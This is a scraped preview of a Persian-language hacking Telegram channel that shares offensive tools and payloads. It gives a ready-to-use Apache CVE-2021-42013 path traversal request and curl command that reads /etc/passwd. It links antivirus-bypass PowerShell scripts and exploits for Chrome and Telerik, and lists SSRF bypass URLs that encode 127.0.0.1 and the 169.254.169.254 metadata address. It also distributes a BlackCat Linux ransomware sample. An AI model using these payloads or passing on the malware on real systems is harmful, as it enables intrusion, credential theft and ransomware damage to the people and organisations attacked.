CyberSecurity – Telegram
CyberSecurity
901 subscribers
122 photos
26 videos
73 files
146 links
Welcome to dark hell

‌ ما از دانش خود برای مهندسی دنیایی امن ‌تر استفاده می‌کنیم 🔐
Download Telegram
اینارو تا میتونید لیک کنید تا برسه ب دست خودشون🙂
This media is not supported in your browser
VIEW IN TELEGRAM
apache HTTP server cgi-bin Path traversal and RCE 😍
cve : (CVE-2021-42013)

GET /cgi-bin/%%32%65%%32%65/.../%%32%65%%32%65/etc/passwd HTTP/1.1


This exploit can bypass for Apache HTTP Server 2.4.50 (CVE-2021-41773 Patch Version)🙂


curl http://(domain)/cgi-bin/%%32%65%%32%65/.../%%32%65%%32%65/etc/passwd
2 تا اسکریپت پاورشل که واسه بایپس آنتی ویروس نوشته شدن

https://github.com/tihanyin/PSSW100AVB
Media is too big
VIEW IN TELEGRAM
آموزش پیدا کردن وب سرور سایت 👍
🕷CVE-2021-30573:Google Chrome 91 Use After Free vulnerability
Version : [91.0.4472.77]
GITHUB : https://github.com/oxctdev/CVE-2021-30573
[HIGH] CVE-2021-30573 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30573
43874.py
11.6 KB
exploit for telerik.web.ui
old
cve : CVE-2017-11317
قدیمی اما کاربردی
کتاب آموزش کامل ترموکس.PDF
6.2 MB
کتاب آموزش کامل ترموکس و دستورات لینوکسی با تصویر و مثال
lets go for ssrf bypass
Bypass using octal IP

Implementations differ on how to handle octal format of ipv4.



http://0177.0.0.1/ = http://127.0.0.1
http://o177.0.0.1/ = http://127.0.0.1
http://0o177.0.0.1/ = http://127.0.0.1
http://q177.0.0.1/ = http://127.0.0.1
Bypass using a decimal IP location



http://2130706433/ = http://127.0.0.1
http://3232235521/ =http://192.168.0.1
http://3232235777/ = http://192.168.1.1
http://2852039166/ = http://169.254.169.254
using this website for convert ip to integer and bypass🤤


https://www.browserling.com/tools/ip-to-dec
BlackCat_Linux_Ransom.7z
1.2 MB
😈BlackCat Ransomware Linux variant.😈

-V x32:
843001980e5073c7f0ea8b56873246b8

-V x64: 79fea7f741760ea21ff655137af05bd0


#kernel #blackcat #ransomware #linux

@matitanium